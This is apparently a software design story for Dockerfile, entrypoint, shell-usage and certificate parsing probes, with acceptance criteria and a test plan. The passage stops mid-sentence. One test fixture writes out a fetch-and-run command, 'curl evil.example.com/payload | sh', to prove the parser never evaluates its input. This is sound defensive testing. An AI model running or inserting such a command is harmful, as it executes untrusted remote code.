Story S5-03 — Dockerfile + Entrypoint + ShellUsage + Certificate marker probes¶
Step: Step 5 — Ship Layer C (runtime + container) probes
Status: Done — GREEN 2026-05-17 (commit pending)
Effort: M
Depends on: S5-02 (the slice schema for runtime_trace is the upstream ShellUsageProbe reads; also wires the disk-anchored raw artifact <repo>/.codegenie/context/raw/runtime_trace.json that ShellUsageProbe/CertificateProbe read via read_raw_slices per S4-01), S4-01 (read_raw_slices(raw_dir) helper at src/codegenie/output/paths.py — the only Phase-2-blessed sibling-slice access path; ctx.sibling_slices does not exist on the frozen ProbeContext), S3-03 (writer chokepoint), S1-08 (@register_probe(heaviness=, runs_last=) — does NOT accept requires=; requires is a Probe class attribute per Phase 0 localv2.md §4 + 02-ADR-0003)
ADRs honored: 02-ADR-0001 (no new binary needed beyond docker/strace; these probes are file-marker driven), 02-ADR-0003 (registry-side scheduling annotations only; requires stays on the contract — @register_probe(...) accepts only heaviness + runs_last), 02-ADR-0007 (no Plugin Loader — probes are in-tree)
Validation notes¶
Validated: 2026-05-16 Verdict: HARDENED Findings addressed: 11 total — 4 blocks, 6 hardens, 1 nit
Changes applied:
- Header Depends on: + ADRs honored: corrected — surfaced the sibling-slice mechanism (read_raw_slices from S4-01) and 02-ADR-0003's requires-is-class-attribute decision — Consistency block C1, C2
- AC for ShellUsageProbe decorator fixed — was @register_probe(...requires=[...]); corrected to class-attribute requires (matches S5-02 + S4-01 precedent and 02-ADR-0003 Option D) — Consistency block C1
- AC for EntrypointProbe.requires added — story said EntrypointProbe reads dockerfile slice but never declared requires — Consistency block C3
- AC-V1, AC-V2 added — sibling-slice access is disk-anchored via read_raw_slices(raw_dir(repo.root)) and every sibling-slice reader degrades to confidence="unavailable" when the upstream .codegenie/context/raw/<name>.json is absent (no race-induced exception) — Consistency block C4 + Coverage harden K1
- AC-V3 added — requires is metadata-only in Phase 2 (the coordinator does NOT topo-sort by it; S1-08's heaviness sort is the only ordering primitive); intra-heaviness="light" ordering between dockerfile/entrypoint/shell_usage/certificate is not guaranteed; the absence-handling discipline (AC-V2) is what makes Layer C deterministic — Consistency block C4
- AC-V4 … AC-V11 added — Dockerfile parser edge cases (line continuations, # comments, case-insensitive directives, ENTRYPOINT/CMD JSON-array vs shell-form parsing, ENV/LABEL multi-pair on one line, HEALTHCHECK NONE vs HEALTHCHECK CMD, Containerfile synonym, COPY --from=<missing-stage> typed signal, ARG directive captured) — Coverage harden K2–K7
- Test 7 reworded as parametrized per-directive + property-based round-trip Test 15 added (Hypothesis-driven parser stability) — Test-Quality harden T1, T2
- Mutation-suite test (Test 16) added — a deliberately weakened parser (skip-RUN, lowercase-only directive table, eager ${VAR} expansion) must fail at least one named test — Test-Quality harden T3
- LOC budget AC tightened — was "≤ 100 LOC excluding docstrings; raw < 150 with 50-line slack"; replaced with a clean per-module non-blank non-comment line ceiling (cloc or equivalent), no slack — Test-Quality nit N1
- Static-evidence schema tightened to typed Pydantic models (StaticShellEvidence + RunCommandEntry) — Design-Patterns harden D1
- Notes for the implementer — added two paragraphs: (a) reuse the read_raw_slices helper from S4-01 (rule-of-three: B2 + ShellUsage + Entrypoint + Certificate; the helper IS the kernel — no per-probe disk-IO duplication); (b) tagged-union Directive sum type opportunity for _tokenize_dockerfile_line (exhaustive match + assert_never = Open/Closed via the compiler) — promoted from nit to a documented opportunity, not an AC, per Rule 2 (only the _tokenize_dockerfile_line extract is mandated; the discriminated-union form is the implementer's call within the LOC budget) — Design-Patterns harden D2, D3
Conflict resolutions:
- Design-Patterns initially proposed mandating a Directive tagged-union sum type as an AC. Demoted to Notes for the implementer per Rule 2 (Simplicity First) — the LOC budget is the harder constraint and one of the two shapes (tuple[Literal[...], dict] vs Directive = FromDirective | RunDirective | …) is fine.
- Coverage proposed an AC asserting "two concurrent gathers of the same repo produce byte-identical Layer C slices". Resolved against — Phase 2 doesn't pin Layer C race semantics globally; AC-V2 (graceful absent-upstream) is the per-probe contract; the cross-probe coordinator-race is S7-04 (Phase 5) territory, not S5-03.
Full audit log: docs/phases/02-context-gather-layers-b-g/stories/_validation/S5-03-layer-c-marker-probes.md
Context¶
The remaining Layer C probes (localv2.md §5.3 C1, C5–C7) are marker-and-parse — each reads Dockerfile (and possibly the runtime_trace slice) and emits a typed slice. None of them invokes a subprocess; none of them needs an ALLOWED_BINARIES addition; each is ≤ 80–100 LOC. They depend on S5-02 only because ShellUsageProbe reads RuntimeTraceProbe's shell_invocations count (the "shell usage" classification combines static Dockerfile evidence with the runtime trace's dynamic evidence — localv2.md §5.3 C5).
The Dockerfile parser is line-by-line with no shell evaluation. We do not run RUN commands; we do not expand ${VAR}; we do not call out to BuildKit's parser. The shape we emit (FROM chain, USER, EXPOSE, HEALTHCHECK, CMD/ENTRYPOINT literals) is what Phase 3's distroless planner reads — sufficient for the planner without inheriting the supply-chain attack surface of a real Dockerfile evaluator. localv2.md §5.3 C1 names the dockerfile Python library as the reference; we adopt it only if it can be vendored without shell evaluation. If not, the parser is a hand-rolled state machine over the line forms named in localv2.md §5.3 C1.
References¶
- localv2.md §5.3 C1 (DockerfileProbe) — output slice schema (stages, base images, run commands, copy directives, entrypoint, cmd, user, workdir, env, exposed ports, healthcheck, labels).
- localv2.md §5.3 C5 (ShellUsageProbe) — static + dynamic shell evidence; replacement catalog (deferred to Phase 3+ — this probe emits the static-side evidence only).
- localv2.md §5.3 C6 (EntrypointProbe), §5.3 C7 (CertificateProbe) — additional marker probes; certificate paths read at runtime feed into the distroless planner.
- phase-arch-design.md §"Component design" #6 —
RuntimeTraceProbeslice fieldsShellUsageProbereads (shell_invocations,binaries_executed). - High-level-impl.md §"Step 5" — "Dockerfile parser is marker + line-by-line (no shell evaluation)".
- 02-ADR-0001 — these probes need no subprocess; the Dockerfile parser is in-process.
- Phase 0 ADR-0004 (
additionalProperties: false) — sub-schema convention.
Goal¶
Land four marker-and-parse probes under src/codegenie/probes/layer_c/: dockerfile.py, entrypoint.py, shell_usage.py, certificate.py. Each is ≤ 100 LOC, each ships with happy-path + marker-absent unit tests, each has a sub-schema under src/codegenie/schema/probes/layer_c/<probe>.schema.json with additionalProperties: false. The Dockerfile parser is line-by-line, no shell evaluation, no RUN execution.
Acceptance criteria¶
- [ ]
src/codegenie/probes/layer_c/dockerfile.pyexists;@register_probe(heaviness="light"); emits the slice shape fromlocalv2.md§5.3 C1. - [ ]
dockerfile.pyparser is line-by-line, no shell evaluation — a unit test asserts that a Dockerfile withRUN $(curl evil.example.com/payload | sh)produces a slice carrying the literal string inrun_commands[].command(not evaluated, not expanded, no network call). A grep test asserts the module source contains zerosubprocess, zeroos.system, zeroeval, zeroexec()calls. - [ ]
dockerfile.pycaptures:FROMchain (all stages);USERdirective per stage;EXPOSEliterals;HEALTHCHECKliteral capture (the full directive line);CMDandENTRYPOINTliterals (execvsshellform distinguished);WORKDIR;ENVkey/value pairs;LABELkey/value pairs;COPY --from=<stage>directives. - [ ] Multi-stage support: a Dockerfile with
FROM build AS builderthenFROM build:finalemitsstageswith the rightinherits_fromlinks. Unit test covers a 2-stage and a 3-stage fixture. - [ ] Marker absent: a repo with no
Dockerfile(and nocontainerfile/Containerfile) emitsconfidence="unavailable"anddockerfiles: []; no exception raised. - [ ] Multi-Dockerfile support: a repo with
Dockerfile+Dockerfile.dev+apps/api/Dockerfileemitsdockerfiles: [<three entries>]; the slice'sdockerfiles[].pathis repo-root-relative. - [ ]
src/codegenie/probes/layer_c/entrypoint.pyexists;@register_probe(heaviness="light")(decorator does NOT acceptrequires=per 02-ADR-0003); the class declaresrequires: list[str] = ["dockerfile"]as a Probe class attribute. Reads thedockerfileslice'sdockerfiles[].entrypointfield from disk viaread_raw_slices(raw_dir(repo.root)); classifies asexec-form vsshell-form; emits a probe-level summary (one final-stage entrypoint per Dockerfile). (validator: hardened — Consistency C1, C3.) - [ ]
entrypoint.pymarker-absent path: no Dockerfile →confidence="unavailable"; Dockerfile with noENTRYPOINTand noCMD→confidence="low"+form="absent". - [ ]
src/codegenie/probes/layer_c/shell_usage.pyexists;@register_probe(heaviness="light")(decorator accepts onlyheaviness+runs_lastper 02-ADR-0003 — do NOT passrequires=); the class declaresrequires: list[str] = ["dockerfile", "runtime_trace"]as a Probe class attribute per Phase 0localv2.md §4and the precedent set by S5-02 (RuntimeTraceProbe.requires == []) and S4-01 (IndexHealthProbe.requires == []). Reads thedockerfileslice and theruntime_traceslice from disk viaread_raw_slices(raw_dir(repo.root))(the helper S4-01 introduced —ctx.sibling_slicesdoes NOT exist on the frozenProbeContext). Emits static evidence only for Phase 2 (the dynamic-evidence-and-replacement-catalog flow is deferred — see "Out of scope"). Static evidence (typed via PydanticStaticShellEvidencemodel):final_stage_entrypoint_form,final_stage_cmd_form,final_stage_run_commands: list[RunCommandEntry](build_timevsruntimeclassification based on stage). (validator: hardened — Consistency C1 + Design-Patterns D1.) - [ ]
shell_usage.pyreadsruntime_trace.shell_invocationsand emitsdynamic_shell_invocation_count: int | None—Nonewhenruntime_trace.confidence == "unavailable"; the integer otherwise. - [ ]
src/codegenie/probes/layer_c/certificate.pyexists;@register_probe(heaviness="light")(decorator does not acceptrequires=per 02-ADR-0003); the class declaresrequires: list[str] = ["runtime_trace"]as a Probe class attribute. Readsruntime_trace.cert_paths_readfrom disk viaread_raw_slices(raw_dir(repo.root))(S4-01 helper;ctx.sibling_slicesdoes NOT exist). Emits the list + a typedcertificate_source: Literal["ca-certificates", "vendored", "absent", "unknown"]classification derived from the path prefixes (/etc/ssl/certs/ca-certificates.crt→"ca-certificates";/app/vendor/certs/prefix →"vendored"; empty list →"absent"). (validator: hardened — Consistency C1.) - [ ] Every probe has a sub-schema under
src/codegenie/schema/probes/layer_c/<name>.schema.jsonwithadditionalProperties: falseat the root and at every nested object (Phase 1 ADR-0004 convention). A sub-schema rejection test per probe presents a slice with one extra field and asserts validation rejects it. - [ ] All four probes' slices flow through the writer chokepoint as
RedactedSlice(S3-03). - [ ]
mypy --strictclean. - [ ] Each module is ≤ 100 LOC (excluding docstrings + imports); enforce via
wc -lsmoke test that asserts< 150raw lines (allow 50-line slack for docstrings). Superseded by AC-V12 below — keep this bullet for diff continuity; AC-V12 is the binding contract. - [ ]
forbidden-patternsstays green — nomodel_construct; nosubprocess; noeval/exec. - [ ] AC-V1 (sibling-slice disk-anchored access).
ShellUsageProbe,EntrypointProbe, andCertificateProberead upstream slice data only from<repo>/.codegenie/context/raw/<name>.jsonvia theread_raw_slices(raw_dir(repo.root))helper that S4-01 introduced atsrc/codegenie/output/paths.py(or its equivalent module path; the executor MUST reuse this helper, not re-implement disk IO). Verified by a structural test that imports each of the three probe modules and asserts (a)read_raw_slicesis the only inbound import fromcodegenie.output.pathsand (b) zero usages ofctx.sibling_slices(which doesn't exist on the frozenProbeContext— failure mode caught: a future contributor inventing a phantom field). (validator: added — Consistency C4 + Design-Patterns D2; rule-of-three: B2 + 3 Layer-C readers = 4th, kernel reuse mandatory.) - [ ] AC-V2 (upstream-slice absent → typed
confidence="unavailable", never raises). Each sibling-slice reader (ShellUsageProbe,EntrypointProbe,CertificateProbe) emitsconfidence="unavailable"with an empty/null payload when its declared upstream raw artifact is absent from disk atrun()time (e.g.,<repo>/.codegenie/context/raw/dockerfile.jsonnot yet written). The probe MUST NOT raise. Verified per probe by a unit test that runs the probe against a fixture where the upstream raw artifact is intentionally missing; assert the typed-error path (no traceback, no exception type leaks into the slice). MirrorsIndexHealthProbe.IndexerError("upstream_<name>_unavailable")discipline (phase-arch-design.md §"Component design" #1). (validator: added — Consistency C4 + Coverage K1; race-safety guarantee.) - [ ] AC-V3 (
requiresis metadata-only in Phase 2). A documentation-level assertion in each module's docstring (and an audit test that greps for the docstring text) records: "The Phase 2 coordinator does NOT topologically sort byrequires(02-ADR-0003 Option D adopted;requiresis the contract-side documentation channel only). Dispatch order withinheaviness=\"light\"is concurrent under the singleasyncio.Semaphore. AC-V2's graceful-absent-upstream behavior is what makes this probe correct under arbitrary scheduling." Verified by a test that greps each of the three module sources for the literal substringrequires is metadata-only. (validator: added — Consistency C4; makes the load-bearing scheduling invariant grep-able for the next contributor.) - [ ] AC-V4 (
#comments + line continuations). The Dockerfile parser ignores leading-#comment lines (excluding# syntax=...directive which is captured separately asparser_directive) and concatenates\-continued physical lines into a single logical directive before tokenization. Unit tests: (a) fixture with#comments insideRUNblocks; (b) fixture withRUN apt-get update \\\n && apt-get install -y foo— assert the capturedrun_commands[0].commandcontains both halves; (c) fixture with# syntax=docker/dockerfile:1.4first line — assert it appears asparser_directiveand is NOT counted as aFROMpredecessor. (validator: added — Coverage K2.) - [ ] AC-V5 (case-insensitive directives). The parser accepts directives in any case (
FROM,from,From) per Docker's reference. Parametrized unit test: same fixture content withFROM/from/Fromproduces identical slices. (validator: added — Coverage K3.) - [ ] AC-V6 (
ENTRYPOINT/CMDJSON-array vs shell-form distinguished). Parser distinguishes the two forms:ENTRYPOINT ["sh", "-c", "echo hi"]→form="exec",argv=["sh","-c","echo hi"];ENTRYPOINT echo hi→form="shell",command="echo hi". Same forCMD. Unit tests cover both forms for each directive, plus a malformed JSON array (ENTRYPOINT ["sh", "-c") → typed signalform="malformed"+ the literal capture preserved (parser does not silently coerce). (validator: added — Coverage K4.) - [ ] AC-V7 (
ENV/LABELmulti-pair on one line). Parser handlesENV A=1 B=2 C=3→env: {A: "1", B: "2", C: "3"}and the equivalent forLABEL; also handles the legacy single-pair-no-equals formENV A 1(per Docker reference, deprecated but legal). Unit tests cover both. Multi-line continuation with\\is tokenized first (per AC-V4) so multi-pair on the resulting joined line works the same. (validator: added — Coverage K5.) - [ ] AC-V8 (
HEALTHCHECK NONEvsHEALTHCHECK CMD). Parser distinguishes the two forms:HEALTHCHECK NONE→healthcheck: {kind: "none"};HEALTHCHECK --interval=30s CMD curl -f http://...→healthcheck: {kind: "cmd", options: {interval: "30s"}, cmd: "curl -f http://..."}. Unit tests cover both. (validator: added — Coverage K6.) - [ ] AC-V9 (
Containerfilesynonym positive test). A fixture repo withContainerfile(noDockerfile) is parsed identically to one withDockerfile; the slice'sdockerfiles[0].pathequalsContainerfile(preserved literally, repo-root-relative). Story already names this synonym in the marker-absent AC; AC-V9 adds the positive test. (validator: added — Coverage K7.) - [ ] AC-V10 (
COPY --from=<missing-stage>typed signal). WhenCOPY --from=builderreferences a stage namebuilderthat was never declared (noFROM ... AS builder), the slice captures the directive literally AND emits a typed structural flagcopy_directives[i].from_stage_resolved: bool = False. Resolved cross-stage references set the flagTrue. Unit test covers both. Rationale: Phase 3's distroless planner reads this signal to surface a parse-time inconsistency without re-implementing the resolution. (validator: added — Coverage K8.) - [ ] AC-V11 (
ARGdirective captured).ARGdirectives (ARG NODE_VERSION=20,ARG NODE_VERSIONwithout default) are captured per stage inargs: list[ArgDirective]withname,default: str | None, andbefore_first_from: bool(the special "global ARG" case Docker uses for parameterizingFROM). Unit test covers both forms + a global ARG precedingFROM ${NODE_VERSION}-alpine— assert the global ARG is recorded and the${NODE_VERSION}reference inFROMis captured literally (no expansion). (validator: added — Coverage K9; closes the Implementation-outline-named-but-AC-missing gap.) - [ ] AC-V12 (LOC budget — clean, no slack). Each of the four modules has ≤ 100 source lines, counted by
cloc(or equivalent: lines that are not blank and not comment-only). Docstrings count as comments and are excluded; imports count as source. No "raw < 150 with 50-line slack" — the budget is the budget. Smoke test callscloc --json src/codegenie/probes/layer_c/<name>.pyand asserts thecodecount ≤ 100 per file. (validator: hardened — replaced the loose smoke; Test-Quality N1.)
Implementation outline¶
dockerfile.py— hand-roll a line-by-line parser. Tokenize each line by leading directive (FROM,RUN,COPY,USER,EXPOSE,HEALTHCHECK,CMD,ENTRYPOINT,WORKDIR,ENV,LABEL,ARG,ONBUILD,STOPSIGNAL,SHELL,VOLUME,MAINTAINER(deprecated, captured anyway)). Pydantic modelDockerfileSlicewithdockerfiles: list[ParsedDockerfile]. Multi-lineRUNwith\continuation is concatenated (preserve\nmarkers in the captured string so a downstream reader can split). Never evaluate — capture literal strings only.entrypoint.py— readsdockerfileslice from disk viaread_raw_slices(raw_dir(repo.root))(the S4-01 helper;ctx.sibling_slicesdoes NOT exist); classification logic is pure. The disk read is the only I/O. Class attributerequires: list[str] = ["dockerfile"]is metadata-only (02-ADR-0003 — coordinator does not topo-sort by it); AC-V2's absent-upstream handling is what makes correctness independent of dispatch order.shell_usage.py— readsdockerfile+runtime_traceslices from disk viaread_raw_slices(...)(same helper). Static classification (final-stageRUNcommands typed asRunCommandEntry, entrypoint form). Class attributerequires: list[str] = ["dockerfile", "runtime_trace"]is metadata-only. The replacement catalog (localv2.md§5.3 C5) is deferred — emit static evidence only, typed viaStaticShellEvidencePydantic model (extra="forbid",frozen=True).certificate.py— readsruntime_trace.cert_paths_readfrom disk viaread_raw_slices(...); classification by path prefix. Class attributerequires: list[str] = ["runtime_trace"]is metadata-only.- Sub-schemas — four
<name>.schema.jsonfiles undersrc/codegenie/schema/probes/layer_c/; each withadditionalProperties: falseat every object node; each referenced bysrc/codegenie/schema/repo-context.schema.jsononeOf/properties(incremental — match how S4-07 wired Layer B sub-schemas). - Tests — happy-path + marker-absent + sub-schema rejection per probe.
TDD plan — red / green / refactor¶
Red:
test_dockerfile_probe_register_light— registry introspection assertsheaviness == "light".test_dockerfile_parser_no_shell_evaluation— feed a fixture Dockerfile containingRUN $(curl evil.example.com | sh); assert the slice'srun_commands[0].command == "$(curl evil.example.com | sh)"literally; assert no network call (mock-spy onsocketimport — already banned byfence).test_dockerfile_parser_no_subprocess_in_source— grep the source: zerosubprocess, zeroos.system, zeroeval(, zeroexec(.test_dockerfile_multi_stage_2andtest_dockerfile_multi_stage_3— fixture Dockerfiles with 2 and 3 stages; assert stage names,inherits_from, base images extracted correctly.test_dockerfile_marker_absent— repo snapshot with noDockerfile; assertconfidence="unavailable",dockerfiles == [].test_dockerfile_multiple_files— fixture withDockerfile,Dockerfile.dev,apps/api/Dockerfile; assert three entries with repo-root-relative paths.test_dockerfile_directive_coverage— parametrized per directive (FROM,RUN,COPY,ADD,USER,EXPOSE,HEALTHCHECK,CMD,ENTRYPOINT,WORKDIR,ENV,LABEL,ARG,ONBUILD,STOPSIGNAL,SHELL,VOLUME,MAINTAINER): each parametrization feeds the smallest fixture exercising that directive and asserts (a) the captured field on the slice matches the expected value (b) every other captured field is at its empty/default state (no spurious capture). Mutation-resistance: a parser that returns the same dict for every directive would fail every parametrization except one. (validator: hardened from "single fixture with one of each" — failure was localised when one of 18 directives broke; Test-Quality T1.)test_entrypoint_probe_exec_formandtest_entrypoint_probe_shell_form— table-driven over["sh", "-c", "echo hi"]vs"echo hi".test_entrypoint_absent— Dockerfile with noENTRYPOINT/CMD→form="absent",confidence="low".test_shell_usage_static_only— feed fixturedockerfileslice +runtime_traceslice; assertfinal_stage_run_commandsreflects onlyRUNlines from the final stage;build_timevsruntimeclassification matches.test_shell_usage_dynamic_count_when_runtime_trace_unavailable—runtime_trace.confidence == "unavailable"→dynamic_shell_invocation_count is None.test_shell_usage_dynamic_count_present—runtime_trace.shell_invocations == 3→dynamic_shell_invocation_count == 3.test_certificate_classification— table over path-prefix → classification:/etc/ssl/certs/ca-certificates.crt→"ca-certificates";/app/vendor/certs/*→"vendored";[]→"absent"; novel path →"unknown".- Per-probe sub-schema rejection: present a slice JSON with one extra field; assert
jsonschema.validateraises. test_dockerfile_parser_property_roundtrip(property-based viahypothesis). Generate arbitrary syntactically-valid Dockerfile fixtures from a Hypothesis grammar (one stage, then multi-stage; pick from the 18 known directives; randomize arg shape, quoting, line continuations, case, comment interleaving). For each generated input, assert the invariant set: (a)parse(text)does not raise; (b) every captured directive appears in the input text (capture-soundness); (c) re-rendering the slice into a canonical Dockerfile form parses to a slice structurally equal to the original (round-trip identity, modulo whitespace); (d) zero shell evaluation evidence (nosocketimport touched, no subprocess spawned —pytest-subprocesssentinel). Shrinker localises any off-by-one tokenization bug to a minimal counter-example. (validator: added — Test-Quality T2; property-based discipline mirrors S1-08's AC-15 hypothesis test.)test_dockerfile_parser_mutation_resistance(mutation suite). A@pytest.mark.parametrizetable of three intentionally-broken parser stubs lives in the test module: (a)_skip_run_directive— same parser but never capturesRUN; (b)_lowercase_only_directive_table— same parser but only matches lowercase directives; (c)_eager_var_expansion— same parser but substitutes${VAR}fromos.environ. For each stub, assert that at least one of the named tests in this module FAILS when the production parser is monkey-patched to the stub (usepytest'srequest.node.session.testscollectedindirection or simply call the stubbed parser inline and assert at-least-one named assertion would fail). This is the structural defense — guarantees the test suite is mutation-strong, not happy-path-only. (validator: added — Test-Quality T3; mirrors theSecretRedactormutation-test discipline atphase-arch-design.md §"Component design" #4last bullet.)test_sibling_slice_absent_unavailable(per probe — three parametrizations:ShellUsageProbe,EntrypointProbe,CertificateProbe). Run each probe against a fixture where the named upstream raw artifact is intentionally absent from<repo>/.codegenie/context/raw/. Assertslice.confidence == "unavailable", the slice payload is the typed empty form (not a partial fill), and no exception propagates (usepytest.raises(...)inverse — a try/except wrapper that fails the test if any exception escapes). (validator: added — AC-V2 verification; race-safety.)test_requires_metadata_only_docstring_present(per probe — three parametrizations). Each ofshell_usage.py,entrypoint.py,certificate.pysource contains the literal substringrequires is metadata-onlysomewhere in the module docstring. Failure mode caught: future contributor deletes the note and silently assumes topo-sort enforcement exists. (validator: added — AC-V3 verification.)test_sibling_slice_reader_is_read_raw_slices(per probe — three parametrizations). AST-walk each of the three reader modules and assert (a) exactly one import ofread_raw_slicesfromcodegenie.output.paths(or the canonical location S4-01 wired), (b) zero references to actx.sibling_slicesattribute (regex on source —ctx\.sibling_slicesmust not match), (c) zero directPath(...).read_text()/open()calls reading from.codegenie/context/raw/(the helper is the only sanctioned path). (validator: added — AC-V1 verification + Design-Patterns D2 kernel-reuse enforcement.)- Edge-case parser tests (cover AC-V4 → AC-V11). Eight named tests, one per added AC:
test_dockerfile_comments_and_continuations,test_dockerfile_case_insensitive_directives,test_dockerfile_entrypoint_exec_vs_shell_form,test_dockerfile_env_multipair,test_dockerfile_label_multipair_and_quoted,test_dockerfile_healthcheck_none_vs_cmd,test_dockerfile_containerfile_synonym_parses,test_dockerfile_copy_from_missing_stage_typed_signal,test_dockerfile_arg_directive_captured_global_and_per_stage. (validator: added — Coverage K2–K9 verification.) test_loc_budget_per_module(smoke). For each of the four modules, invokecloc --json(or, ifclocis not on PATH in CI, a Python-native equivalent that strips blank lines, comment-only lines, and docstring blocks) and assert thecodecount ≤ 100. Per-module, no slack. (validator: added — AC-V12 verification; Test-Quality N1.)
Green:
- Implement the four parsers + the four sub-schemas.
- Declare
requiresas a class attribute onShellUsageProbe,EntrypointProbe, andCertificateProbe(the Phase 0ProbeABC definesrequires: list[str]as a class field perlocalv2.md §4; S5-02 set the precedent withrequires: list[str] = []). Do NOT passrequires=to@register_probe(...)— per 02-ADR-0003 the decorator accepts onlyheaviness+runs_last.requiresis metadata; correctness comes from AC-V2 (graceful absent-upstream), not from coordinator topo-sort. - Reuse
read_raw_slices(raw_dir(repo.root))from S4-01 for all sibling-slice access. Do not duplicate disk IO in any of the three probes. - Make all red tests pass.
Refactor:
- Extract Dockerfile-line tokenization into
_tokenize_dockerfile_line(line: str) -> Directive | None— pure, table-driven, easily unit-testable. - Confirm each module is ≤ 100 LOC (excluding docstrings); refactor if not.
- Each probe's
run()is a 10–20-line wrapper around the pure parser/classifier — keep the I/O thin.
Files to touch¶
- New:
src/codegenie/probes/layer_c/dockerfile.py,src/codegenie/probes/layer_c/entrypoint.py,src/codegenie/probes/layer_c/shell_usage.py,src/codegenie/probes/layer_c/certificate.py. - New schemas:
src/codegenie/schema/probes/layer_c/{dockerfile,entrypoint,shell_usage,certificate}.schema.json. - New tests:
tests/unit/probes/layer_c/{test_dockerfile.py,test_entrypoint.py,test_shell_usage.py,test_certificate.py}. - New fixtures:
tests/fixtures/dockerfiles/{single_stage,two_stage,three_stage,no_dockerfile,evil_run_command,multi_dockerfile}/.... - Possibly extend:
src/codegenie/schema/repo-context.schema.json— wire the four sub-schemas (mirror how S4-07 wired Layer B).
Out of scope¶
- The replacement catalog (
localv2.md§5.3 C5 — the YAML-driven shell-replacement classifier) — defer to Phase 3 / Phase 7 when the distroless planner consumes it; this probe emits static evidence only. - Falling back to BuildKit's
buildctl debug dump-llb(localv2.md§5.3 C1 fallback) — explicitly not in Phase 2 (would requirebuildctlinALLOWED_BINARIES, no ADR). If the hand-rolled parser proves insufficient on the portfolio fixtures, surface as an ADR-amend candidate in Phase 3. secrets in Dockerfiledetection (COPY --chown=...:... secrets.json /app) —gitleaks(S6-07) catches secrets at the file level; this probe surfaces theCOPYdirective literally and letsgitleaksdo its job.- The
runtime_tracesub-schema — landed by S5-02 / S5-04 (this story validates the slice shape only as a downstream reader). SBOMProbe/CVEProbe— S5-04.
Notes for the implementer¶
requiresis a class attribute, not a@register_probekwarg — and it is metadata-only in Phase 2. Two precedents to follow:- 02-ADR-0003 picked Option D:
@register_probe(...)accepts onlyheaviness+runs_last. Therequires: list[str]field is on the Probe ABC (localv2.md §4, frozen). Passingrequires=to the decorator will either be aTypeErroror — worse — silently accepted by a permissive**kwargsand dropped on the floor. - S5-02 set the precedent:
class RuntimeTraceProbe(Probe): requires: list[str] = []. S4-01 validation (_validation/S4-01-index-health-probe.md) explicitly catalogued the equivalent phantom in IndexHealthProbe and forced the fix; this story carries the precedent forward.
The coordinator does NOT topologically sort by requires (rejected as Option C in 02-ADR-0003 — "lies about dependencies"). Dispatch order within heaviness="light" is concurrent under the single asyncio.Semaphore. AC-V2 is what makes Layer C correct: each sibling-slice reader degrades to confidence="unavailable" when the upstream raw artifact isn't yet on disk. Do NOT propose a coordinator-side topo-sort in this story; that's a separate ADR conversation. Do NOT propose adding requires to @register_probe's signature; that's a re-litigation of 02-ADR-0003.
-
Sibling-slice access is disk-anchored — reuse the S4-01 helper.
ProbeContextis contract-frozen (Phase 0 ADR-0007). It does not carrysibling_slices. The only Phase-2-blessed path to read a sibling's slice isread_raw_slices(raw_dir(repo.root))atsrc/codegenie/output/paths.py(or the canonical location S4-01 wired). With B2 (S4-01) +ShellUsageProbe+EntrypointProbe+CertificateProbe, this is now the 4th consumer ofread_raw_slices— the rule-of-three threshold is well past, the helper IS the kernel. Do not re-implement disk IO in any of the three Layer C readers. AC-V1 + Test 19 (AST audit) is the structural enforcement. -
Directivetagged-union opportunity (optional — implementer's call, not an AC). The Dockerfile_tokenize_dockerfile_line(line: str) -> Directive | Nonehelper is a natural home for a tagged-union sum type:Each variant is a frozen Pydantic model with aDirective = FromDirective | RunDirective | CopyDirective | UserDirective | ExposeDirective \ | HealthcheckDirective | CmdDirective | EntrypointDirective | WorkdirDirective \ | EnvDirective | LabelDirective | ArgDirective | OnbuildDirective \ | StopsignalDirective | ShellDirective | VolumeDirective | MaintainerDirective \ | AddDirectiveLiteral["..."]discriminator onkind. The parser dispatch becomes amatch directive: case FromDirective(): ... case _: assert_never(directive)— exhaustive checking via the compiler / mypy--warn-unreachable. This is make illegal states unrepresentable + Open/Closed via match exhaustiveness (adding a new directive forces amatcharm). Trade-off: ≥ 18 small model definitions add ~30–50 LOC just for the types. The LOC budget is AC-V12 (≤ 100 source lines per module). If you can fit the sum-type version under budget (likely by moving the directive models into a sibling modulesrc/codegenie/probes/layer_c/_dockerfile_directives.pynot counted againstdockerfile.py's budget), prefer it — the structural enforcement is worth it. If not, atuple[Literal["FROM", "RUN", ...], dict[str, str]]is acceptable and the parser keeps the exhaustivematchonkind. The validator does not mandate the sum-type form; the only mandate is the_tokenize_dockerfile_lineextract (Refactor step 1). -
Original "
requiresmechanism" note retained context (deprecated). The earlier version of this story said "S5-04 introduces therequiresmechanism if not already in S1-08 — surface inNotes for the implementer." That framing is incorrect — see the first bullet above. S5-04 will hit the same Consistency block at its own validation pass and resolve the same way (class-attribute, metadata-only, AC-V2-style absent-upstream handling). localv2.md§5.3 C1 namesdockerfile(the Python library) as the parser of choice. Evaluate it: if it ships with shell evaluation enabled by default (or imports anything fromsubprocess), we cannot adopt it. Hand-rolled parser is the safe fallback — Dockerfile's surface is small (~20 directives), and the test corpus covers the shapes Phase 3 will need. Decision criterion: zero shell evaluation, zero subprocess imports. If the vendored library passes the audit, prefer it; otherwise hand-roll. Document the decision in the module docstring.secrets in Dockerfilepath: aRUNcommand containingAWS_SECRET_ACCESS_KEY=AKIA…flows through the writer chokepoint and is redacted via S3-01'sSecretRedactor. The dockerfile parser does not filter; it captures the literal, the writer redacts. This is the same chokepoint discipline Layer G scanners use.requiresordering vs cache. IfRuntimeTraceProbecache-HITs (per S5-02), the downstream probes (ShellUsageProbe,CertificateProbe) still need the cached slice's content. The coordinator's slice-map (Phase 0) carries cached output to dependent probes; no special handling here.- Multi-Dockerfile semantics. Some repos have
Dockerfilefor production +Dockerfile.devfor development + per-app Dockerfiles underapps/<service>/Dockerfile. We emit all of them;RuntimeTraceProbe(S5-02) traces only one (the canonicalDockerfileat repo root, configurable via.codegenie/scenarios.yamlin a future ADR). Phase 3's planner reads the parsed list and picks which one to migrate. shell_usage.pyreplacement catalog deferral. The catalog (localv2.md§5.3 C5) is the kind of org-uniqueness data that lives under~/.codegenie/replacement-catalogs/and is loaded by a Phase 3 / Phase 7 loader — not Phase 2. The CLAUDE.md commitment "organizational uniqueness as data, not prompts" applies here: Phase 2 emits the evidence; Phase 3+ owns the catalog. Resist landing a catalog loader here even if the YAML format is obvious.certificate_sourceclassification table. Keep it small (4 buckets). If the portfolio surfaces a fifth pattern, extend via ADR-amend (small, additive).additionalProperties: falseis non-negotiable per Phase 1 ADR-0004; the rejection test per probe is the structural enforcement.mypy --warn-unreachable— these four modules are simple enough that an exhaustivematchisn't load-bearing; the S1-11 per-module override list need not include them. If amatchon a discriminated union shows up (e.g., 